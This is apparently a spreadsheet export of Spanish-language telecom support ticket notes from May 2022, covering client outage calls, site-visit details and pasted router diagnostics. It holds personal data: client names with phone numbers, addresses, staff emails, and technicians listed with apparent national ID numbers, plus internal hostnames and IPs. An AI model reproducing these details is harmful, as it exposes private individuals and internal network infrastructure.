    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 4/4/7 MS
&lt;AAPASVZTN1D1EID1&gt;</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  JOSE PEREZ AL 78471779 SE SOLICITAN DATOS DE VISITA Y BRINDA LOS SIGUIENTES**
HORARIO DE ATENCION: 7:00 A 15:00 AM
GESTION DE PERMISOS: SOLO IDENTIFICADOS
DIRECCION: CARRETERA A JOAYUA CALLE VIEJA KM 87 MUNICIPIO LA UNION SONSONATE COMO REFENCIA INDICA QUE PUEDEN COLOCAR EN EL NAVEGADOR  FINCA ARIZONA
ATENDERA EN SITIO: ENRIQUE ESPERANZA - 78601531
ID 1001557435
**</t>
  </si>
  <si>
    <t>F4574093</t>
  </si>
  <si>
    <t>CLIENTE UBICA EQUIPO AETHRA Y NOS APOYA CON REINICIAR EL EQUIPO
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ISMAEL SANCHEZ AL 47909962 CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
ID 1001595735
**</t>
  </si>
  <si>
    <t>F4574109</t>
  </si>
  <si>
    <t>*/*/*/CLIENTE YOSTIN SON INDICA QUE YA TIENE EL RESULTADO DE LAS PRUEBAS SOLICITADAS, POR LO QUE DESEA HABLAR CON EL GESTOR A CARGO, SE CONTACTA A CNOC Y SE DEJA EN CONFERENCIA CLIENTE/GESTOR WAGNER.POLANCO*/*/*/</t>
  </si>
  <si>
    <t>SE LE INFOERMA A CLIENTE QUE TIENE QUE REVISAR SU RED INTERNA, ACTUALMENTE SE OBSERVA SATURACION DE SU LAN, CILENTE SOLICITA LLAMAR EN 30 MINS YA QUE ESTARA REALIZANDO PRUEBAS CON UNA PC DIRECTA AL ROUTER DE CLARO. ADICIONAL SE LE ENVIO CORREO:
DESPUES DE UN REINICIO SIGUE LA SATURACION
CC_ISOPAN_GT_UTATLAN#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26000        12     12000         9         0
  GIGABITETHERNET0/0/1          0         0         0         0         0         0         0         0         0
* GIGABITETHERNET0/1/0          0         0         0         0  57876000     50850    342000       638         0
  GIGABITETHERNET0/1/1          0         0         0         0         0         0         0         0         0
  GIGABITETHERNET0/1/2          0         0         0         0         0         0         0         0         0
  GIGABITETHERNET0/1/3          0         0         0         0         0         0         0         0         0
* LOOPBACK5                     0         0         0         0         0         0         0         0         0
* VLAN1                         6       504         0         0  54012000     49051    615000      1224         0
CC_ISOPAN_GT_UTATLAN#SHOW  FLOW MONITOR TEST CACHE
  CACHE TYPE:                               NORMAL (PLATFORM CACHE)
  CACHE SIZE:                                32768
  CURRENT ENTRIES:                              17
  HIGH WATERMARK:                               25
  FLOWS ADDED:                                1164
  FLOWS AGED:                                 1147
    - ACTIVE TIMEOUT      (     1 SECS)       1147
IPV4 SRC ADDR    IPV4 DST ADDR    INTF INPUT            INTF OUTPUT                     BYTES LONG             PKTS LONG
===============  ===============  ====================  ====================  ====================  ====================
192.168.2.14     13.91.16.67      VL1                   NULL                                   198                     1
192.168.2.14     172.217.2.206    VL1                   GI0/0/0                                724                     3
192.168.2.76     192.168.2.255    VL1                   NULL                                194454                  2493
192.168.2.16     213.239.213.142  VL1                   NULL                                    40                     1
192.168.2.14     52.113.194.132   VL1                   NULL                                    41                     1
192.168.2.86     8.8.4.4          VL1                   GI0/0/0                                 71                     1
192.168.2.14     212.102.60.103   VL1                   NULL                                   576                     1
192.168.2.86     13.107.136.9     VL1                   NULL                                    52                     1
192.168.2.14     157.240.18.52    VL1                   NULL                                    52                     1
192.168.2.86     13.69.116.104    VL1                   NULL                                    52                     1
192.168.2.86     8.8.8.8          VL1                   NULL                                   147                     2
192.168.2.14     64.31.17.42      VL1                   GI0/0/0                                 40                     1
192.168.2.14     142.250.217.174  VL1                   NULL                                   104                     2
192.168.2.16     185.229.191.41   VL1                   GI0/0/0                                 80                     2
192.168.2.14     20.42.65.90      VL1                   NULL                                    52                     1
192.168.2.200    255.255.255.255  VL1                   NULL                                540764                  2492
192.168.2.86     212.102.60.65    VL1                   NULL                                   533                     6</t>
  </si>
  <si>
    <t>F4574113</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ALLAN PONCE 33400239 MENCIONA QUE NO CUENTAN CON ENERGIA ELECTRICA PORQUE SE DAÑARON UNOS TRANSFORMADORES
-ID 1001605348</t>
  </si>
  <si>
    <t>F4574126</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE FERNANDO LEMUS 30606775 MENCIONA QUE SI CUENTA CON ENERGIA Y YA APLICARON REINCIO
SE SOLICITAN DATOS DE POSIBLE VISITA TECNICA
-ID 1001607637 - 1001608505
NOMBRE DEL CLIENTE: COMITE PROCIEGOS Y SORDOS DE GUATEMALA
UBICACIÓN:DIAGONAL 21 19-19 ZONA 11 COLONIA MARISCAL
CONTACTO EN SITIO: FERNANDO LEMUS - 30606775
HORARIO DE ATENCION: 7:00 - 15:00
GESTIÓN DE PERMISOS: CUANDO YA ESTE PERSONAL TECNICO EN PR LLAMAR A CLIENTE FERNANDO LEMUS - 30606775 PARA QUE PUEDA AUTORIZAR EL INGRESO</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE FERNANDO LEMUS 30606775 SOLICITA QUE SE  LE LLAME EN 10 MIN NUEVAMENTE**
ID 1001805649
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE FERNANDO LEMUS 30606775 CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
ID 1001811740
**</t>
  </si>
  <si>
    <t>F4574127</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE RICARDO AYES 32122508  MENCIONA QUE YA ESTAN AUTORIZADOS LOS PERMISOS
-ID 1001648412</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE SOLICITANDO COORDINAR LOS ACCESOS
JOHN RAMOS
0501-1995-07643
HUGO PINEDA
0501-2000-09002
ORLIN FUENTES
1618-1986-00852
OSCAR PAZ
0501-2000-11392
LUIS AMAYA
0501-2001-01539
JUAN VÁSQUEZ
0511-1996-01357
JORGE RODAS
0601-1986-03731</t>
  </si>
  <si>
    <t>SE LLAMO NUEVAMENTE A CLIENTE SIN EMBARGO NO RESPONDE---
32122508</t>
  </si>
  <si>
    <t>F4574132</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE  PEDRO CABRERA 31161319 INDICA QUE LA TELEFONÍA YA NO DIO PROBLEMAS, PERO PRESENTA LENTITUD EN SU SERVICIO DE INTERNET, SE PROCEDE AL CIERRE DEL TICKET
1001738275
COLA:
NOMBRE: A: 31161319
NÚMERO: 011 50231161319
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA:NORMAL, ESPECIFICADA (CÓDIGO CAUSA ISDN31)]
DURACIÓN: 0:01:38
DETALLES: +50231161319
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSEGODINEZ
FECHA Y HORA LOCALES: 23/05/2022 16:08:45</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE  PEDRO CABRERA 31161319  PERO NO SE TIENE RESPUESTA, SE INTENTARA EN UNOS INSTANTES
1001728203
COLA:
NOMBRE: A: 31161319
NÚMERO: 55280199
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DURACIÓN: 0:00:32
DETALLES: 55280199
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSEGODINEZ
FECHA Y HORA LOCALES: 23/05/2022 15:38:08
1001728462
COLA:
NOMBRE: A: 31161319
NÚMERO: 55280199
ESTADO: CONECTADA
DURACIÓN: 0:00:32
DETALLES: 55280199
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSEGODINEZ
FECHA Y HORA LOCALES: 23/05/2022 15:38:34</t>
  </si>
  <si>
    <t>F4574133</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE RAUL CANO, COMENTA QUE SE PUEDE SUSPENDER EL SERVICIO NO MAXIMO 10 MINUTOS, POR LO QUE COMENTA QUE HAY PERSONAL EN SITIO TRABAJANDO  Y NO PUEDEN QUEDARSE SIN SERVICIO MUCHO TIEMPO, SE ESTARA CONSULTANDO CON LIDERES
1001778062
COLA:
NOMBRE: A: 58261614
NÚMERO: 58261614
DURACIÓN: 0:02:20
ESTADO: CONECTADA
DETALLES: 58261614
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JUAN.LOPEZS
FECHA Y HORA LOCALES: 23/05/2022 18:48:04</t>
  </si>
  <si>
    <t>TECNICO LLAMA PARA REVISION AUN SE VEN VALORES ALTOS EN TARJETA CTC
&lt;ESC&gt;:GO TO PREVIOUS MENU.
     CTC UNION TECHNOLOGIES CO., LTD.      FRM220A-GSW/SNMP     VER.[1.063]
===============================================================================
THIS CHASSIS ID:[00]     CASCADED:[NO ]     MONITORED CHASSIS ID:[00]
SLOT #05 &gt; FRM220A-1000EAS/X        [LOCAL] VER:[1.300-1.044-0.000-0.000]
&lt;&lt;&lt; LOCAL FIBER 2 SFP AND D/D FUNCTION &gt;&gt;&gt;
VENDOR NAME          [CTC UNION       ]
VENDOR PART NUMBER   [SFS-7020-WA-DD  ]
FIBER TYPE           [SINGLE]
WAVE LENGTH          [1310 KM]
WAVE LENGTH 2        [1550 KM]
LINK LENGTH          [20 KM]
TX POWER             [-6 DBM]
RX POWER             [-26 DBM]
RX SENSITIVITY       [-23 DBM]
TEMPERATURE          [36 ¿ ]</t>
  </si>
  <si>
    <t>F4574142</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CARLOS GOMEZ 30088637 SE DEJA EN CONFERENCIA CON GESTOR
-ID 1001584664</t>
  </si>
  <si>
    <t>F4574143</t>
  </si>
  <si>
    <t>DEBIDO A QUE NO RESPONDE ETX1 EN CLEINTE, SE LLAMA A FREDDY MORALES, CLIENTE,  Y SE DESCARTA ENERGIA  COMERCIAL,
&lt;EESCGTESN1T1A04B02EIM4&gt;PING -VPN-INSTANCE ADMIN_RAD_ISLAS 10.87.149.223
  PING 10.87.149.223: 56  DATA BYTES, PRESS CTRL_C TO BREAK
    REQUEST TIME OUT
    REQUEST TIME OUT
    REQUEST TIME OUT
    REQUEST TIME OUT
    REQUEST TIME OUT
  --- 10.87.149.223 PING STATISTICS ---
    5 PACKET(S) TRANSMITTED
    0 PACKET(S) RECEIVED
    100.00% PACKET LOSS
&lt;EESCGTESN1T1A04B02EIM4&gt;PING -VPN-INSTANCE ADMIN_RAD_ISLAS 10.87.149.222
  PING 10.87.149.222: 56  DATA BYTES, PRESS CTRL_C TO BREAK
    REQUEST TIME OUT
    REQUEST TIME OUT
    REQUEST TIME OUT
    REQUEST TIME OUT
    REQUEST TIME OUT
  --- 10.87.149.222 PING STATISTICS ---
    5 PACKET(S) TRANSMITTED
    0 PACKET(S) RECEIVED
    100.00% PACKET LOSS
1001572774
COLA:
NOMBRE: A: 40805817
NÚMERO: 40805817
DURACIÓN: 0:00:57
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 40805817
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: LUVY.SANDOVAL
FECHA Y HORA LOCALES: 23/05/2022 08:47:52</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE FREDDY MORALES 40805817  PARA BRINDAR RETROALIMENTACION
-ID 1001703185</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE LUIS FERNANDO ASTEGUIETA 56338357 PARA BRINDAR RETROALIMENTACION
CLIENTE SOLICITA QUE CUALQUIER AVANCE SEA CON EL
-ID 1001704002</t>
  </si>
  <si>
    <t>F4574144</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE PABLO FLORES 55161590  CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
AUTORIZA CIERRE DE TICKET **
ID 1001624526
**</t>
  </si>
  <si>
    <t>F4574157</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  DOUGLAS RAMOS AL 30133256 CONTESTA UNA SEÑORITA  E INDICA QUE ES NUMERO EQUIVOCADO **
ID 1001618837
**</t>
  </si>
  <si>
    <t>F4574160</t>
  </si>
  <si>
    <t>SE HABLA CON CLIENTE- JENIFER PEREZ-50502944   INDICA QUE TUVIERON PROBLEMAS DE ENERGIA + QUE ENCENDIO EQUIPOS POR QUE ESTABAN APAGADO-- SE LE COMENTA QUE EN ESTE MOMENTO EL SERVICIO SE OBSERVA ACTIVO- CLIENTE REALIZZA PRUEBAS EN LLAMADAS ENTRANTES Y SALIENTES ##CONFIRMA FUNCIONAMIENTO ##PBX NO HABIA TERMINADO DE ENCENDERSE ##VIVO</t>
  </si>
  <si>
    <t>F4574161</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE FRANCISCO URCUYO 84542264 CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
ID 1001822863
**</t>
  </si>
  <si>
    <t>F4574169</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SRTA. HEYDI STUART 56996439 SE LE SOLICITA REALIZAR PRUEBAS EN SUS EQUIPOS Y CONEXIONES, ID: 1001570292.</t>
  </si>
  <si>
    <t>**CLIENTE SRTA. HEYDI STUART 56996439 CLIENTE CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
ID 1001744316
**</t>
  </si>
  <si>
    <t>CLIENTE SRTA. HEYDI STUART 56996439 INFORMA QUE LLAMARA AL ENCARGADO DE IT PARA QUE APOYE REVISANDO SU RED INTERNA, SOLICITA NO CERRAR EL INCIDENTE PARA VALIDAR EN EL TRANSCURSO DE LA TARDE.</t>
  </si>
  <si>
    <t>F4574173</t>
  </si>
  <si>
    <t>INDICA PERSONAL DE BANCO AZTECA PROBLEMAS DE ENERGIA ELECTRICA</t>
  </si>
  <si>
    <t xml:space="preserve"> SE LE SOLICITO NUEVO REINICIO A CLIENTE SRTA. ZULEMA SANCHEZ  40923256 ESTA VEZ DE DESCONECTO MAS TIEMPO EL CTC REMOTO, DESPUES DE CONECTAR A LA ENERGIA ENLACE LEVANTO:
&lt;PSAYGTSAN1C1A08A03EIM2&gt;PING -C 3000 -S 1400 -M 30 -B -VPN ELEKTRADATOS 10.87.205.13
  PING 10.87.205.13: 1400  DATA BYTES, PRESS CTRL_C TO BREAK
    ...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  --- 10.87.205.13 PING STATISTICS ---
    3000 PACKET(S) TRANSMITTED
    2249 PACKET(S) RECEIVED
    25.03% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/1/24 MS</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR.  EDGAR GUZMAN 5306 7213 NO CONTESTO , ID: 2001139620.</t>
  </si>
  <si>
    <t xml:space="preserve">
SERGIO DE MONITOREO DE BANCO AZTECA CONFIRMA QUE CONTINUAN PROBLEMAS DE ENERGIA EN SITIO</t>
  </si>
  <si>
    <t>F4574179</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE SEÑOR MIGUEL ANGEL AL 30470893 INDICA QUE EL CUBRE SACAPULAS PERO QUE SE PUEDEN PRESENTAR LOS TECNICOS **
ID 2001065963
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE A LA AGENCIA  51683197 NO RESPONDE, SE INTENTARA LUEGO PARA CONFIRMAR ACCESOS **
ID 2001042333
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE A LA AGENCIA  51683197 CONTESTA EL SEÑOR NEXCALI CABILAN E INDICA QUE NO TIENE CONOCIMIENTO DEL REPORTE SOLICITA QUE SE LE LLAME AL SEÑOR MIGUEL ANGEL AL 30470893 EXT 1225  **
ID 2001063794
**</t>
  </si>
  <si>
    <t>*** SE ENVÍA CORREO NUEVAMENTE A CLIENTE, A LA ESPERA QUE CONFIRME AUTORIZACIÓN DE ACCESOS ***
DE: ANGEL DANIEL TORRES AJTUN &lt;ANGEL.TORRES@CLARO.COM.GT&gt;
ENVIADO: MIÉRCOLES, 25 DE MAYO DE 2022 7:32
PARA: JAIME JOSUE HERNANDEZ CASTILLO &lt;JAIMEJ.HERNANDEZ@CLARO.COM.GT&gt;; SOPORTE@GENESISEMPRESARIAL.COM &lt;SOPORTE@GENESISEMPRESARIAL.COM&gt;; GPU@GENESISEMPRESARIAL.COM &lt;GPU@GENESISEMPRESARIAL.COM&gt;; HELPDESK@GENESISEMPRESARIAL.COM &lt;HELPDESK@GENESISEMPRESARIAL.COM&gt;
CC: SOPORTE N1 CNOC &lt;SOPORTEN1.CNOC@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;
ASUNTO: RE: 245700185T || FUNDACION GENESIS ||
ESTIMADOS BUEN DÍA,
EN SEGUIMIENTO DEL CASO, FAVOR DE SU APOYO EN PODER AUTORIZAR LOS ACCESOS PARA EL PERSONAL DESCRITO ANTERIORMENTE.
CUALQUIER DUDA O COMENTARIO QUEDO A LA ORDEN,
SALUDOS CORDIALES.</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE SEÑOR MIGUEL ANGEL AL 30470893 NO RESPONDE SE INTENTARA LUEGO **
ID 2001197862 - 2001198283
**</t>
  </si>
  <si>
    <t>F4574183</t>
  </si>
  <si>
    <t>CLIENTE INDICA QUE NO ENCONTRO LA INFORMACION DE LA CREDENCIALES DE LA PBX, SOLICITA QUE SE LE PUEDA DAR OTRA SOLUCION SE L EINDICA QUE SERIA DE ESCALAR CON EL PROVEEDOR DE LA PBX PARA VALIDAR SI ELLOS PUEDEN REVISAR LA CONFIGURACION O DARNOS ALGUNA INFORMACION DE LAS CREDENCIALES, CLIENTE QUEDA ENTERADO E INDICA QUE ESTARA DANDO SEGUIMIENTO CON EL PROVEEDOR##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  ARMANDO GARCIA 33433159  MENCIONA QUE EL PROVEEDOR ESTA VERIFICANDO SUS EQUIPOS POR LO QUE SOLICITA LLAMADA PARA LAS 15:00 HRS
-ID 1001896173</t>
  </si>
  <si>
    <t>SE RECIBE LLAMADA DE TEC JUAN QUIEN COMENTA QUE PERSONAL DE LA PBX SIGUE TRABAJANDO PERO QUE EL SERVICIO NO HA LEVANTADO Y QUE NO TIENEN LA INFORMACION DE LAS CREDENCIALES, TECNICO SE RETIRARA DE LAS INSTALACIONES DEL CLIENTE Y SE ESTARA RECOORDINANDO CUANDO YA TENGA LA INFORMACION DE LAS CREDENCIALES
SE CONTACTA CON CLIENTE ARMANDO 33433159 QUIEN INDICA QUE ESTA VALIDANDO LA INFORMACION DE LAS CREDENCIALES CON EL PROVEEDOR Y CON EL JEFE DE PARTE DE ELLOS, INDICA QUE ESTIMA UNA RESPUESTA DE 15 MIN
#LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SE CONTACTA CON CLIENTE  ARMANDO GARCIA  33433159   PARA VALIDAR EL TIEMPO ESTIMADO EN EL QUE LLEGARA EL PROVEEDOR, INDICA QUE APROX 10 MIN ESTARA EN SITIO, SE INFORMA A TECNICO
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ARMANDO GARCIA 3433159 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE EL PROBLEMA ESTABA EN LA PBX
-ID 1001958200</t>
  </si>
  <si>
    <t>SE CONTACTA CON CLIENTE  ARMANDO GARCIA  33433159  / 24249919 PARA REALIZAR PRUEBAS
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SE LE INDICA AL CLIENTE LAS PRUEBAS REALIZADAS A NIVEL DE TRAZA Y LA LIBERACION QUE TENEMOS DE PARTE DE LA PBX, CLIENTE INDICA QUE YA REINICIO LA MISMA PERO QUE EL SERVICIO NO HA LEVANTADO, CLIENTE INDICA QUE AUN NO HA ESCALADO CON EL PROVEEDOR DE LA PBX YA QUE QUIERE DESCARTAR QUE NO FUERA PROBLEMA A NIVEL DE CLARO, SE LE INDICA QUE ES NECESARIO REALIZAR PRUEBAS DE SIMULACION CON LA PBX EN SITIO CON TECNICOS PERO ES NECESARIO TENER LAS CONTRASEÑAS DE LA PBX, CLIENTE NO CUENTA CON LA INFORMACION POR LO QUE ESTARA BUSCANDO Y NOS DEVOLVER LA LLAMADA
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>F4574184</t>
  </si>
  <si>
    <t>**SE LLAMA A  CLIENTE YOHENI REYES AL 89204245 OPERADORA INDICA QUE NUMERO ESTA APAGO O FUERA DEL AREA DE COBERTURA, SE INTENTARA LUEGO **
ID 1001630659
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE LILIET ESPINOZA -25830301  MENCIONA QUE PERSISTE EL INCONVENIENTE, SE DEJA EN CONFERENCIA CON GESTOR
-ID 1001700520</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE YOHENI REYES 89204245 MENCIONA QUE NO SE ENCUENTRA EN PR POR LO QUE BRINDA CONTACTO LILIET ESPINOZA -25830301
-ID 1001700127</t>
  </si>
  <si>
    <t>**SE LLAMA A  CLIENTE YOHENI REYES AL 89204245 SOLICITA QUE SE LE LLAME DESPUES DE LAS 13 HRS YA QUE ANDA ALMORZANDO  **
ID 1001665387
**</t>
  </si>
  <si>
    <t>F4574197</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JULIO GARCIA  AL 30061253 INDICA QUE REALIZO PRUEBAS PERO AUN NO TIENE RESPUESTA SE CONTACTA A GESTOR Y SE DEJA EN LINEA CON CLIENTE **
ID 1001631582
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. JULIO GARCIA 30061253 NO CONTESTO IVR ENVIA A BUZON, ID: 1001576886.</t>
  </si>
  <si>
    <t>F4574200</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ALLAN HERNANDEZ 42207505 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 1001596437 - 1001597085</t>
  </si>
  <si>
    <t>F4574205</t>
  </si>
  <si>
    <t>CLEINTE INDICA QUE YA TODO ESTA BIEN- ##EQUIPO ESTABA INIHBIDO ## SE PROCEDE AL CIERRE ##REALIZA PRUEBAS EN LLAMADAS Y YA TODO OK ##</t>
  </si>
  <si>
    <t>SE TIENE A CLIENTE EN LINEA- CAROLILNA GALINDO-57464785 ##VIVO</t>
  </si>
  <si>
    <t>F4574211</t>
  </si>
  <si>
    <t>SE CONTACTA CON CLIENTE JULIO GARCIA 30061253 PARA REALIZAR PRUEBAS
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SEGUIMIENTO CON PERSONAL TÉCNICO ASIGNADO; ADICIONAL SE LLAMÓ/HABLÓ CON JULIO GARCÍA/CLIENTE 30061253 Y SE LE PIDE APOYO PARA ATENDER A TÉCNICOS, INDICA QUE YA PERMITIERON LA ENTRADA Y SE CONFIRMA EL CORTE DE FO EN SECTOR. LE DIJERON QUE ESTÁN A LA ESPERA QUE PERSONAL DE FO LLEGUE PARA SOLUCIONAR LO REPORTADO.</t>
  </si>
  <si>
    <t>F4574213</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE MARIA EUGENIA AL 88434027   NO RESPONDE ENVIA DIRECTAMENTE A BUZON || SE INTENTARA LUEGO **
ID 1001637888
**</t>
  </si>
  <si>
    <t>SE LAMA A CLIENTE MARIA EUGENIA 88434027 MENCIONA QUE YA APLICARON REINICIO PERO INCONVENIENTE PERSISTE
-ID 1001663459
NOMBRE DEL CLIENTE: INAFORINAFOR
UBICACIÓN:KILOMETRO 68.5 CARRETERA MANAGUA LEON
CONTACTO EN SITIO: 88434027  /  MARIA EUGENIA
HORARIO DE ATENCION:8:00 - 17:00
GESTIÓN DE PERMISOS: CUANDO PERSONAL ESTE EN PR PREGUNTAR POR MARIA EUGENIA
* -*-*-*-*</t>
  </si>
  <si>
    <t>F4574217</t>
  </si>
  <si>
    <t>**SE LLAMA  A CLIENTE CRUZ SANCHEZ AL 82386140  CLIENTE CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
ID 1001638903
**</t>
  </si>
  <si>
    <t>F4574227</t>
  </si>
  <si>
    <t>SE CONVERSA CON CLIENTE SHEILA, INDICA QUE SE HA APLICADO REINICIO A LOS EQUIPOS PERO SERVICIO NO LEVANTA,  SE LE SOLICITAN FOTOS VIA WHATSAP AL 42105135
NÚMERO: 0050587516906
FIN: HOY, 09:54
ID DE LLAMADA: 1001598943</t>
  </si>
  <si>
    <t>SE LE ENVIA MENSAJE DE WHATSAPP A CLIENTE, SE LLAMA PARA CONFIRMAR QUE LO RECIBIO, INDICA QUE LO VA A REVISAR Y CORTA LA LLAMADA
1001606657
COLA:
NOMBRE: A: 0050587516906
NÚMERO: 0050587516906
DURACIÓN: 0:01:06
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 0050587516906
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: LUVY.SANDOVAL
FECHA Y HORA LOCALES: 23/05/2022 10:13:15</t>
